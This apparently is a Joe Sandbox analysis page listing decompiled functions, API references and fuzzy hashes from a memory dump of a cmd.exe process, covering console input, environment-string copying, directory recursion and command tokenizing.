Opcode Fuzzy Hash: ce66f82a6b1dd1e8f375cb0393b9c3442971a802acb20aee2c5da9f12b4a081e
Instruction Fuzzy Hash: 661166B0D0C2A19AEB346B549C8EF7C7AE4AB30B10F49022EF4D15B9A5D7B8C5C5D254

Uniqueness

Uniqueness Score: -1.00%

Function 001C7513 Relevance: 7.6, APIs: 5, Instructions: 51
timethreadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E001C7513() {
				void* _v8;
				struct _FILETIME _v16;
				signed int _v20;
				union _LARGE_INTEGER _v24;
				signed int _t23;
				signed int _t36;
				signed int _t37;
				signed int _t39;

				_v16.dwLowDateTime = _v16.dwLowDateTime & 0x00000000;
				_v16.dwHighDateTime = _v16.dwHighDateTime & 0x00000000;
				_t23 =  *0x1dd0b4; // 0xea614d48
				if(_t23 == 0xbb40e64e || (0xffff0000 & _t23) == 0) {
					GetSystemTimeAsFileTime( &_v16);
					_v8 = _v16.dwHighDateTime ^ _v16.dwLowDateTime;
					_v8 = _v8 ^ GetCurrentProcessId();
					_v8 = _v8 ^ GetCurrentThreadId();
					_v8 = GetTickCount() ^ _v8 ^  &_v8;
					QueryPerformanceCounter( &_v24);
					_t36 = _v20 ^ _v24.LowPart ^ _v8;
					_t39 = _t36;
					if(_t36 == 0xbb40e64e || ( *0x1dd0b4 & 0xffff0000) == 0) {
						_t36 = 0xbb40e64f;
						_t39 = 0xbb40e64f;
					}
					 *0x1dd0b4 = _t39;
				}
				_t37 =  !_t36;
				 *0x1dd0b8 = _t37;
				return _t37;
			}

0x001c751b
0x001c751f
0x001c7523
0x001c7536
0x001c7540
0x001c754c
0x001c7555
0x001c755e
0x001c756f
0x001c7576
0x001c7582
0x001c7585
0x001c7589
0x001c7593
0x001c7598
0x001c7598
0x001c759a
0x001c759a
0x001c75a0
0x001c75a3
0x001c75ac

APIs

GetSystemTimeAsFileTime.API-MS-WIN-CORE-SYSINFO-L1-1-0(00000000), ref: 001C7540
GetCurrentProcessId.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 001C754F
GetCurrentThreadId.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 001C7558
GetTickCount.API-MS-WIN-CORE-SYSINFO-L1-1-0 ref: 001C7561
QueryPerformanceCounter.API-MS-WIN-CORE-PROFILE-L1-1-0(?), ref: 001C7576

Memory Dump Source

Source File: 0000000E.00000002.519238609.00000000001B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000E.00000002.519773087.00000000001F9000.00000040.80000000.00040000.00000000.sdmpDownload File
Associated: 0000000E.00000002.519818892.00000000001FD000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1b0000_cmd.jbxd

Similarity

API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
String ID:
API String ID: 1445889803-0
Opcode ID: d3f0f069a8b898652224cfecd8ee2ab4b0d347d4bc1cfff6f973135a77b34455
Instruction ID: cec71d69e510c0d047300a40b4885c905aed904d28afa752d30fa59208ff2e0a
Opcode Fuzzy Hash: d3f0f069a8b898652224cfecd8ee2ab4b0d347d4bc1cfff6f973135a77b34455
Instruction Fuzzy Hash: AA110D71D06108EBCB10DFB8E948AAEB7F5EF58315F55446AE405D7650E7309A41CF41

Uniqueness

Uniqueness Score: -1.00%

Function 001D3BB0 Relevance: 7.5, APIs: 5, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 63%

			E001D3BB0(void* __eflags) {
				signed int _v8;
				char _v12;
				void* __ecx;
				void* _t7;
				signed short _t13;
				signed int _t14;
				void* _t15;
				void* _t22;
				void* _t23;

				_push(_t15);
				_push(_t15);
				_t23 = GetStdHandle(0xfffffff6);
				_t7 = E001BC108(_t15, 0x232b, 0, _t22);
				if(_t23 != 0) {
					if(E001C0178(_t7) == 0 || ( *0x1f3aa0 & 0x00000001) == 0) {
						E001D3B11(_t23,  &_v8, 1,  &_v12);
					} else {
						_t13 = FlushConsoleInputBuffer(_t23);
						__imp___getch();
						_t14 = _t13 & 0x0000ffff;
						_v8 = _t14;
						if(_t14 == 3) {
							EnterCriticalSection( *0x1e3858);
							 *0x1dd544 = 1;
							LeaveCriticalSection( *0x1e3858);
						}
					}
				}
				E001C25D9(L"\r\n");
				return 0;
			}

0x001d3bb5
0x001d3bb6
0x001d3bc7
0x001d3bc9
0x001d3bd2
0x001d3bdd
0x001d3c30
0x001d3be8
0x001d3be9
0x001d3bef
0x001d3bf5
0x001d3bf8
0x001d3bff
0x001d3c07
0x001d3c13
0x001d3c1d
0x001d3c1d
0x001d3bff
0x001d3bdd
0x001d3c3a
0x001d3c46

APIs

GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F6,?,?,?,?,001C997F,00000000,?,001DA0FC,?,?,?), ref: 001D3BBA

Part of subcall function 001C0178: _get_osfhandle.MSVCRT ref: 001C0183
Part of subcall function 001C0178: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(00000000,001CD6A1), ref: 001C018D

FlushConsoleInputBuffer.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000,?,001C997F,00000000,?,001DA0FC,?,?,?), ref: 001D3BE9
_getch.MSVCRT ref: 001D3BEF
EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,001C997F,00000000,?,001DA0FC,?,?,?), ref: 001D3C07
LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,001C997F,00000000,?,001DA0FC,?,?,?), ref: 001D3C1D

Memory Dump Source

Source File: 0000000E.00000002.519238609.00000000001B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000E.00000002.519773087.00000000001F9000.00000040.80000000.00040000.00000000.sdmpDownload File
Associated: 0000000E.00000002.519818892.00000000001FD000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1b0000_cmd.jbxd

Similarity

API ID: CriticalSection$BufferConsoleEnterFileFlushHandleInputLeaveType_get_osfhandle_getch
String ID:
API String ID: 491502236-0
Opcode ID: 6314f2e5f69680d00145c8eb8143f2ece172fb56f396c73998d7b9b0f7dcad58
Instruction ID: 1c885fa298c6a2177c32316c4e6d7ef33a29da7676bee504a713ff0868cb4910
Opcode Fuzzy Hash: 6314f2e5f69680d00145c8eb8143f2ece172fb56f396c73998d7b9b0f7dcad58
Instruction Fuzzy Hash: DD017132515259BBD714AB64AC5EFBA7B68DB10320F10025BF816966E0DBB19AC0C692

Uniqueness

Uniqueness Score: -1.00%

Function 001C3AAE Relevance: 7.5, APIs: 5, Instructions: 32
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E001C3AAE() {
				int _t9;
				void* _t12;
				WCHAR* _t13;

				_t13 = GetEnvironmentStringsW();
				_t12 = 0;
				if(_t13 != 0) {
					_t9 = E001C3B00(_t13);
					_t12 = HeapAlloc(GetProcessHeap(), 8, _t9);
					if(_t12 != 0) {
						memcpy(_t12, _t13, _t9);
					}
					FreeEnvironmentStringsW(_t13);
				}
				return _t12;
			}

0x001c3ab8
0x001c3aba
0x001c3abe
0x001c3ac8
0x001c3ada
0x001c3ade
0x001c3ae3
0x001c3ae8
0x001c3aec
0x001c3af2
0x001c3af7

APIs

GetEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(00000000,00000000,001C3A9F), ref: 001C3AB2
GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,00000000,00000000), ref: 001C3ACD
HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 001C3AD4
memcpy.MSVCRT ref: 001C3AE3
FreeEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(00000000), ref: 001C3AEC

Memory Dump Source

Source File: 0000000E.00000002.519238609.00000000001B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000E.00000002.519773087.00000000001F9000.00000040.80000000.00040000.00000000.sdmpDownload File
Associated: 0000000E.00000002.519818892.00000000001FD000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1b0000_cmd.jbxd

Similarity

API ID: EnvironmentHeapStrings$AllocFreeProcessmemcpy
String ID:
API String ID: 713576409-0
Opcode ID: debdd37609752f5d48fa0c9b5002df9c4846e482053f098ce0b151e363509937
Instruction ID: f207a7a3fc5e483c766ca5f0f85e0fe9f5e094397fb95ff0d0aaf410cd684420
Opcode Fuzzy Hash: debdd37609752f5d48fa0c9b5002df9c4846e482053f098ce0b151e363509937
Instruction Fuzzy Hash: 18E092B360411167C21137296C4CFBF695EDBD9A7170A4068F919C3240DF30CD46C1B1

Uniqueness

Uniqueness Score: -1.00%

Function 001C5266 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 303
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E001C5266(void* __ecx, signed int __edx, intOrPtr _a4, intOrPtr _a8, unsigned int _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32) {
				signed int _v8;
				signed int _v12;
				int _v16;
				signed int _v20;
				signed int _v24;
				int _v28;
				intOrPtr _v48;
				intOrPtr _v52;
				signed int _v56;
				char _v60;
				char** _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				void _v76;
				intOrPtr _v96;
				intOrPtr _v100;
				char _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				intOrPtr _v120;
				void _v124;
				unsigned int _t115;
				void* _t123;
				intOrPtr _t129;
				void* _t138;
				signed int _t140;
				signed int _t141;
				signed int _t143;
				signed int _t144;
				signed int _t145;
				intOrPtr _t146;
				void* _t147;
				intOrPtr _t152;
				intOrPtr _t162;
				char _t163;
				char* _t164;
				void* _t168;
				void* _t172;
				char* _t180;
				char* _t181;
				void* _t182;
				signed int _t183;
				signed int _t195;
				void* _t196;
				void* _t197;
				intOrPtr* _t198;
				intOrPtr _t203;
				intOrPtr _t204;
				intOrPtr _t210;
				signed int _t211;
				signed int _t216;
				signed int _t218;
				void* _t220;
				void* _t222;
				void* _t224;
				void* _t225;
				intOrPtr _t227;
				intOrPtr _t231;

				_t195 = __edx;
				_v20 = __edx;
				_t168 = __ecx;
				_v28 = 0;
				_v16 = 0;
				_t227 =  *0x1dd544; // 0x0
				if(_t227 != 0) {
					L47:
					return 1;
				}
				_t115 = _a12;
				_v8 = _t115;
				_t208 = _t115 >> 0x00000002 & 1;
				_t123 = E001C5590(__ecx, __edx, _a4, _a8, _t115 >> 0x00000002 & 1, _a16, _a20, _a24, _a28, _a32);
				if(_t123 == 0) {
					_v16 = 1;
					_t216 = _v8 & 0x00000001;
					L4:
					E001C0040( *((intOrPtr*)(_t168 + 0x18)));
					 *((intOrPtr*)(_t168 + 0x18)) = 0;
					_t231 =  *0x1dd544; // 0x0
					if(_t231 != 0) {
						goto L47;
					}
					if(_t216 == 0) {
						return 0;
					}
					memset( &_v76, 0, 0x30);
					_t225 = _t224 + 0xc;
					_t129 = E001C297B( *((intOrPtr*)(_t168 + 4)));
					_t172 = 0x10;
					_v72 = _t129;
					_t173 = E001C00B0(_t172);
					if(_t173 == 0) {
						L51:
						E001D9287(_t173);
						__imp__longjmp(0x1eb8b8, 1);
						L52:
						_v56 = _t195;
						_t218 = _t195;
						L10:
						if( *0x1dd544 != 0) {
							goto L47;
						}
						_v12 = _t195;
						if(_v56 <= 0) {
							L38:
							E001C0040(_v48);
							E001C0040(_v52);
							E001C0040(_v64[1]);
							E001C0040(_v64);
							E001C0040(_v72);
							if(_t218 != 0 || _v16 != _t218) {
								return _t218;
							} else {
								_push(2);
								L41:
								_pop(_t138);
								return _t138;
							}
						} else {
							goto L12;
						}
						do {
							L12:
							_t180 = ".";
							_t210 =  *((intOrPtr*)(_v48 + _v12 * 4));
							_t37 = _t210 + 0x30; // 0x30
							_t140 = _t37;
							_v24 = _t140;
							while(1) {
								_t196 =  *_t140;
								if(_t196 !=  *_t180) {
									break;
								}
								if(_t196 == 0) {
									L17:
									_t141 = 0;
									L18:
									if(_t141 == 0) {
										goto L37;
									}
									_t181 = L"..";
									_t41 = _t210 + 0x30; // 0x30
									_t144 = _t41;
									while(1) {
										_t197 =  *_t144;
										if(_t197 !=  *_t181) {
											break;
										}
										if(_t197 == 0) {
											L24:
											_t145 = 0;
											L25:
											if(_t145 == 0) {
												goto L37;
											}
											if((_v8 & 0x00000002) != 0 || ( *(_t210 + 4) & 0x00000400) == 0) {
												L28:
												_t198 =  *((intOrPtr*)(_t168 + 4));
												_t51 = _t198 + 2; // 0x402
												_t182 = _t51;
												do {
													_t146 =  *_t198;
													_t198 = _t198 + 2;
												} while (_t146 != 0);
												_t211 = _v24;
												_t183 = _t211;
												_t195 = _t198 - _t182 >> 1;
												_t220 = _t183 + 2;
												do {
													_t147 =  *_t183;
													_t183 = _t183 + 2;
												} while (_t147 != _v28);
												_t55 = _t195 + 2; // 0x400
												_t185 = _t183 - _t220 >> 1;
												_t222 = _t55 + (_t183 - _t220 >> 1);
												if(_t222 > 0x7fe7) {
													_push(_t211);
													E001BC5A2(_t185, 0x400023d8, 2,  *((intOrPtr*)(_t168 + 4)));
													_push(0x6f);
													goto L41;
												}
												memset( &_v124, 0, 0x30);
												_t225 = _t225 + 0xc;
												_t173 = _t222 + _t222;
												_t152 = E001C00B0(_t222 + _t222);
												if(_t152 == 0) {
													goto L51;
												}
												_v120 = _t152;
												E001C51C9(_t152, _t222,  *((intOrPtr*)(_t168 + 4)), _t211);
												_v112 =  *((intOrPtr*)(_t168 + 0xc));
												_v116 =  *((intOrPtr*)(_t168 + 8));
												_v108 =  *((intOrPtr*)(_t168 + 0x10));
												_t218 = E001C5266( &_v124, _v20, _a4, _a8, _v8, _a16, _a20, _a24, _a28, _a32);
												E001C0040(_v100);
												_v100 = 0;
												E001C0040(_v96);
												_v96 = 0;
												E001C0040(_v120);
												_v120 = 0;
												if(_t218 == 0) {
													_v16 = 1;
													goto L37;
												}
												if(_t218 != 2) {
													if(_t218 != 0x6f && _t218 != 3) {
														_t162 =  *((intOrPtr*)(_v48 + _v12 * 4));
														if(( *(_t162 + 4) & 0x00000400) == 0) {
															goto L38;
														}
														if(( *(_t162 + 0x28) & 0x20000000) != 0) {
															goto L36;
														}
														if( *(_t162 + 0x28) != 0x8000000a) {
															goto L38;
														}
													}
												}
												L36:
												_t218 = 0;
												goto L37;
											} else {
												if(( *(_t210 + 0x28) & 0x20000000) != 0 ||  *(_t210 + 0x28) == 0x8000000a) {
													goto L37;
												} else {
													goto L28;
												}
											}
										}
										_t203 =  *((intOrPtr*)(_t144 + 2));
										_t43 =  &(_t181[2]); // 0x2e
										if(_t203 !=  *_t43) {
											break;
										}
										_t144 = _t144 + 4;
										_t181 =  &(_t181[4]);
										if(_t203 != 0) {
											continue;
										}
										goto L24;
									}
									asm("sbb eax, eax");
									_t145 = _t144 | 0x00000001;
									goto L25;
								}
								_t204 =  *((intOrPtr*)(_t140 + 2));
								_t40 =  &(_t180[2]); // 0x200000
								if(_t204 !=  *_t40) {
									break;
								}
								_t140 = _t140 + 4;
								_t180 =  &(_t180[4]);
								if(_t204 != 0) {
									continue;
								}
								goto L17;
							}
							asm("sbb eax, eax");
							_t141 = _t140 | 0x00000001;
							goto L18;
							L37:
							_t143 = _v12 + 1;
							_v12 = _t143;
						} while (_t143 < _v56);
						goto L38;
					}
					_t163 =  *((intOrPtr*)(_t168 + 0x10));
					_v60 = _t163;
					_v64 = _t173;
					_t164 = L"*.*";
					_v68 = 1;
					_v76 = 0;
					if(_t163 == 0) {
						_t164 = "*";
					}
					 *_t173 = _t164;
					_v64[1] = E001C297B(_v72);
					_v64[3] = 0;
					_t218 = E001C5590( &_v76, _v20, 0x10, 0x10, _t208, 0, 0, 0, 0, 0);
					_t195 = 0;
					if(_t218 != 0) {
						goto L52;
					} else {
						goto L10;
					}
				}
				if(_t123 != 2) {
					if(_t123 == 3) {
						goto L3;
					}
				} else {
					L3:
					_t216 = _v8 & 0x00000001;
					if(_t216 != 0) {
						goto L4;
					}
				}
				return _t123;
			}

0x001c5266
0x001c5271
0x001c5274
0x001c5276
0x001c527b
0x001c527e
0x001c5284
0x001c5587
0x00000000
0x001c5589
0x001c528a
0x001c5291
0x001c52af
0x001c52b7
0x001c52be
0x001c5561
0x001c5567
0x001c52d9
0x001c52dc
0x001c52e3
0x001c52e6
0x001c52ec
0x00000000
0x00000000
0x001c52f4
0x00000000
0x001c556f
0x001c5303
0x001c530b
0x001c530e
0x001c5315
0x001c5316
0x001c531e
0x001c5322
0x001cf105
0x001cf105
0x001cf111
0x001cf117
0x001cf117
0x001cf11a
0x001c5380
0x001c5387
0x00000000
0x00000000
0x001c5391
0x001c5394
0x001c5521
0x001c5524
0x001c552c
0x001c5537
0x001c553f
0x001c5547
0x001c554e
0x00000000
0x001c5555
0x001c5555
0x001c5557
0x001c5557
0x00000000
0x001c5557
0x00000000
0x00000000
0x00000000
0x001c539a
0x001c539a
0x001c539d
0x001c53a5
0x001c53a8
0x001c53a8
0x001c53ab
0x001c53ae
0x001c53ae
0x001c53b4
0x00000000
0x00000000
0x001c53bd
0x001c53d8
0x001c53d8
0x001c53da
0x001c53dc
0x00000000
0x00000000
0x001c53e2
0x001c53e7
0x001c53e7
0x001c53ea
0x001c53ea
0x001c53f0
0x00000000
0x00000000
0x001c53f9
0x001c5414
0x001c5414
0x001c5416
0x001c5418
0x00000000
0x00000000
0x001c5422
0x001c5431
0x001c5431
0x001c5436
0x001c5436
0x001c5439
0x001c5439
0x001c543c
0x001c543f
0x001c5444
0x001c5449
0x001c544b
0x001c544d
0x001c5450
0x001c5450
0x001c5453
0x001c5456
0x001c545e
0x001c5461
0x001c5463
0x001c546b
0x001cf193
0x001cf19e
0x001cf1a6
0x00000000
0x001cf1a6
0x001c547a
0x001c547f
0x001c5482
0x001c5485
0x001c548c
0x00000000
0x00000000
0x001c5498
0x001c549d
0x001c54b4
0x001c54c0
0x001c54cc
0x001c54da
0x001c54dc
0x001c54e6
0x001c54e9
0x001c54f1
0x001c54f4
0x001c54fb
0x001c5500
0x001cf140
0x00000000
0x001cf140
0x001c5509
0x001cf14f
0x001cf164
0x001cf16e
0x00000000
0x00000000
0x001cf17b
0x00000000
0x00000000
0x001cf188
0x00000000
0x00000000
0x001cf18e
0x001cf14f
0x001c550f
0x001c550f
0x00000000
0x001cf121
0x001cf128
0x00000000
0x001cf13b
0x00000000
0x001cf13b
0x001cf128
0x001c5422
0x001c53fb
0x001c53ff
0x001c5403
0x00000000
0x00000000
0x001c5409
0x001c540c
0x001c5412
0x00000000
0x00000000
0x00000000
0x001c5412
0x001c557d
0x001c557f
0x00000000
0x001c557f
0x001c53bf
0x001c53c3
0x001c53c7
0x00000000
0x00000000
0x001c53cd
0x001c53d0
0x001c53d6
0x00000000
0x00000000
0x00000000
0x001c53d6
0x001c5573
0x001c5575
0x00000000
0x001c5511
0x001c5514
0x001c5515
0x001c5518
0x00000000
0x001c539a
0x001c5328
0x001c532b
0x001c5330
0x001c5333
0x001c5338
0x001c533f
0x001c5342
0x001c5344
0x001c5344
0x001c5349
0x001c535e
0x001c536c
0x001c5374
0x001c5376
0x001c537a
0x00000000
0x00000000
0x00000000
0x00000000
0x001c537a
0x001c52c7
0x001cf0fa
0x00000000
0x001cf100
0x001c52cd
0x001c52cd
0x001c52d0
0x001c52d3
0x00000000
0x00000000
0x001c52d3
0x001c555e

APIs

Part of subcall function 001C5590: memset.MSVCRT ref: 001C5614

Part of subcall function 001C0040: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,00000000,?,00000000,001C36B3,001C3691,00000000), ref: 001C0078
Part of subcall function 001C0040: RtlFreeHeap.NTDLL(00000000), ref: 001C007F

memset.MSVCRT ref: 001C5303

Part of subcall function 001C00B0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,?,001BDF68,00000001,?,00000000,001C3458,-00000105,001DBDD8,00000240,001C4B82,00000000,00000000,001CAE6E,00000000), ref: 001C00C1
Part of subcall function 001C00B0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,001BDF68,00000001,?,00000000,001C3458,-00000105,001DBDD8,00000240,001C4B82,00000000,00000000,001CAE6E,00000000,?), ref: 001C00C8

memset.MSVCRT ref: 001C547A
longjmp.MSVCRT(001EB8B8,00000001,?,?,?), ref: 001CF111

Strings

*.*, xrefs: 001C5333

Memory Dump Source

Source File: 0000000E.00000002.519238609.00000000001B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000E.00000002.519773087.00000000001F9000.00000040.80000000.00040000.00000000.sdmpDownload File
Associated: 0000000E.00000002.519818892.00000000001FD000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1b0000_cmd.jbxd

Similarity

API ID: Heap$memset$Process$AllocFreelongjmp
String ID: *.*
API String ID: 539101449-438819550
Opcode ID: fbe9c1356065e323db40ab52bba377457625d1fbd7f72622121c8bce6a84356e
Instruction ID: e1c528882c50848cc5f03f77456a2e0ca64158f2b012aa1370ce100e1f5f9677
Opcode Fuzzy Hash: fbe9c1356065e323db40ab52bba377457625d1fbd7f72622121c8bce6a84356e
Instruction Fuzzy Hash: C8B17971A006159BCB24DFA8C941FAEBBB7AF78350F16406DE805AB251E731ED91CB90

Uniqueness

Uniqueness Score: -1.00%

Function 001BF090 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 188
COMMON

Download Yara Rule

C-Code - Quality: 46%

			E001BF090(intOrPtr* __ecx, intOrPtr __edx, intOrPtr* _a4, intOrPtr* _a8) {
				signed int _v8;
				intOrPtr _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t17;
				intOrPtr _t19;
				signed int _t26;
				signed int _t27;
				signed int _t28;
				intOrPtr _t37;
				signed int _t40;
				signed int _t41;
				void* _t43;
				intOrPtr _t46;
				intOrPtr* _t51;
				intOrPtr _t59;
				intOrPtr _t61;
				signed int _t62;
				intOrPtr _t68;
				intOrPtr _t69;
				intOrPtr* _t70;
				intOrPtr _t71;
				intOrPtr* _t72;
				intOrPtr* _t73;
				intOrPtr* _t74;
				signed int _t75;
				void* _t76;
				intOrPtr _t83;

				_t66 = __edx;
				_t17 =  *0x1dd0b4; // 0xea614d48
				_v8 = _t17 ^ _t75;
				_t73 = _a8;
				_v12 = __edx;
				_t70 = __ecx;
				if(_t73 == E001C0210) {
					_t19 = E001C0210(__ecx, __edx);
				} else {
					if(_t73 == E001C0480) {
						_t19 = E001C0480();
					} else {
						if(_t73 == E001C0600) {
							_t19 = E001C0600();
						} else {
							if(_t73 != E001C0620) {
								 *0x1f94b4();
								_t19 =  *_t73();
							} else {
								_t19 = E001C0620();
							}
						}
					}
				}
				_t46 = _t19;
				if( *((short*)( *0x1eb8a4)) == 0) {
					L21:
					return E001C6FD0(_t46, _t46, _v8 ^ _t75, _t66, _t70, _t73);
				} else {
					_t83 =  *0x1dd554; // 0x0
					if(_t83 != 0) {
					}
					_t68 = E001BF300(0x10, 0x1efaa0, 0x2000, 0x10);
					 *0x1efa90 = _t68;
					if(_t68 == 0xffffffff) {
						 *0x1ef980 = 0x234a;
						__imp__longjmp(0x1eb940, 1);
						goto L49;
					} else {
						_t62 = 0x1efaa0;
						_t4 = _t62 + 2; // 0x1efaa2
						_t73 = _t4;
						do {
							_t43 =  *_t62;
							_t62 = _t62 + 2;
						} while (_t43 != 0);
						_t5 = (_t62 - _t73 >> 1) + 1; // 0x1efa9f
						 *0x1efa8c = _t5;
						if( *0x1ef984 != 0) {
							L49:
							_push(0x1efaa0);
							_push(_t68);
							E001C25D9(L"GeToken: (%x) \'%s\'\n");
							_t76 = _t76 + 0xc;
						}
					}
					_t26 = 0x1efaa0;
					_t51 = _t70;
					while(1) {
						_t69 =  *_t51;
						if(_t69 !=  *_t26) {
							break;
						}
						if(_t69 == 0) {
							L17:
							_t27 = 0;
						} else {
							_t6 = _t51 + 2; // 0x2b0000
							_t66 =  *_t6;
							if(_t66 !=  *((intOrPtr*)(_t26 + 2))) {
								break;
							} else {
								_t51 = _t51 + 4;
								_t26 = _t26 + 4;
								if(_t66 != 0) {
									continue;
								} else {
									goto L17;
								}
							}
						}
						L18:
						if(_t27 == 0) {
							if( *0x1efaa0 == 0xa) {
								goto L34;
							} else {
								_t71 = _v12;
								goto L37;
							}
						} else {
							_t40 =  *0x1dd558; // 0x0
							if( *((char*)(_t40 + 0x1ef987)) == 0x33) {
								_t41 = "&";
								while(1) {
									_t59 =  *_t70;
									if(_t59 !=  *_t41) {
										break;
									}
									if(_t59 == 0) {
										L30:
										_t40 = 0;
									} else {
										_t10 = _t70 + 2; // 0x2b0000
										_t61 =  *_t10;
										_t11 = _t41 + 2; // 0x2b0000
										if(_t61 !=  *_t11) {
											break;
										} else {
											_t70 = _t70 + 4;
											_t41 = _t41 + 4;
											if(_t61 != 0) {
												continue;
											} else {
												goto L30;
											}
										}
									}
									L31:
									if(_t40 != 0 ||  *0x1efaa0 != 0xa) {
										goto L20;
									} else {
										do {
											L34:
											_t28 = E001BF030(0);
										} while ( *0x1efaa0 == 0xa);
										_t66 = 0;
										E001BF300(_t28, 0, 0, 0);
										if( *0x1efaa0 == 0x29) {
											goto L21;
										} else {
											_t71 = 0x2e;
											L37:
											_t74 = E001C00B0(0x50);
											if(_t74 == 0) {
												E001D9287(0x50);
												__imp__longjmp(0x1eb8b8, 1);
												asm("int3");
												_push( *0x1eb8a0);
												E001C25D9(L"Ungetting: \'%s\'\n");
												 *0x1eb8a4 =  *0x1eb8a0;
												return 0;
											} else {
												 *_t74 = _t71;
												 *((intOrPtr*)(_t74 + 0x38)) = _t46;
												 *0x1dd548 = 1;
												E001BF030(8);
												_t72 = _a4;
												 *0x1dd548 = 0;
												if(_t72 != E001BE8C0) {
													 *0x1f94b4();
													_t37 =  *_t72();
												} else {
													_t37 = E001BE8C0();
												}
												 *((intOrPtr*)(_t74 + 0x3c)) = _t37;
												return E001C6FD0(_t74, _t46, _v8 ^ _t75, _t66, _t72, _t74);
											}
										}
									}
									goto L52;
								}
								asm("sbb eax, eax");
								_t40 = _t41 | 0x00000001;
								goto L31;
							} else {
								L20:
								_t66 = 0;
								E001BF300(_t40, 0, 0, 0);
								goto L21;
							}
						}
						goto L52;
					}
					asm("sbb eax, eax");
					_t27 = _t26 | 0x00000001;
					goto L18;
				}
				L52:
			}

0x001bf090
0x001bf098
0x001bf09f
0x001bf0a4
0x001bf0a7
0x001bf0ab
0x001bf0b3
0x001bf0e0
0x001bf0b5
0x001bf0bb
0x001bf1c2
0x001bf0c1
0x001bf0c7
0x001bf1cc
0x001bf0cd
0x001bf0d3
0x001cc48d
0x001cc493
0x001bf0d9
0x001bf0d9
0x001bf0d9
0x001bf0d3
0x001bf0c7
0x001bf0bb
0x001bf0e5
0x001bf0f0
0x001bf1ad
0x001bf1bf
0x001bf0f6
0x001bf0f8
0x001bf0fe
0x001bf1d6
0x001bf114
0x001bf116
0x001bf11f
0x001cc4a1
0x001cc4ab
0x00000000
0x001bf125
0x001bf125
0x001bf12a
0x001bf12a
0x001bf130
0x001bf130
0x001bf133
0x001bf136
0x001bf146
0x001bf149
0x001bf14e
0x001cc4b1
0x001cc4b1
0x001cc4b6
0x001cc4bc
0x001cc4c1
0x001cc4c1
0x001bf14e
0x001bf154
0x001bf159
0x001bf160
0x001bf160
0x001bf166
0x00000000
0x00000000
0x001bf16f
0x001bf18a
0x001bf18a
0x001bf171
0x001bf171
0x001bf171
0x001bf179
0x00000000
0x001bf17f
0x001bf17f
0x001bf182
0x001bf188
0x00000000
0x00000000
0x00000000
0x00000000
0x001bf188
0x001bf179
0x001bf18c
0x001bf18e
0x001bf2da
0x00000000
0x001bf2e0
0x001bf2e0
0x00000000
0x001bf2e0
0x001bf194
0x001bf194
0x001bf1a0
0x001bf1e0
0x001bf1f0
0x001bf1f0
0x001bf1f6
0x00000000
0x00000000
0x001bf1ff
0x001bf21a
0x001bf21a
0x001bf201
0x001bf201
0x001bf201
0x001bf205
0x001bf209
0x00000000
0x001bf20f
0x001bf20f
0x001bf212
0x001bf218
0x00000000
0x00000000
0x00000000
0x00000000
0x001bf218
0x001bf209
0x001bf21c
0x001bf21e
0x00000000
0x001bf230
0x001bf230
0x001bf230
0x001bf232
0x001bf237
0x001bf243
0x001bf247
0x001bf254
0x00000000
0x001bf25a
0x001bf25a
0x001bf25f
0x001bf269
0x001bf26d
0x001cc4c9
0x001cc4d5
0x001cc4db
0x001cc4dc
0x001cc4e7
0x001bf43d
0x001bf44a
0x001bf273
0x001bf278
0x001bf27a
0x001bf27d
0x001bf287
0x001bf28c
0x001bf28f
0x001bf29f
0x001bf2ea
0x001bf2f0
0x001bf2a1
0x001bf2a1
0x001bf2a1
0x001bf2a9
0x001bf2bb
0x001bf2bb
0x001bf26d
0x001bf254
0x00000000
0x001bf21e
0x001bf2c8
0x001bf2ca
0x00000000
0x001bf1a2
0x001bf1a2
0x001bf1a4
0x001bf1a8
0x00000000
0x001bf1a8
0x001bf1a0
0x00000000
0x001bf18e
0x001bf2be
0x001bf2c0
0x00000000
0x001bf2c0
0x00000000

Strings

GeToken: (%x) '%s', xrefs: 001CC4B7
Ungetting: '%s', xrefs: 001CC4E2

Memory Dump Source

Source File: 0000000E.00000002.519238609.00000000001B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001B0000, based on PE: true

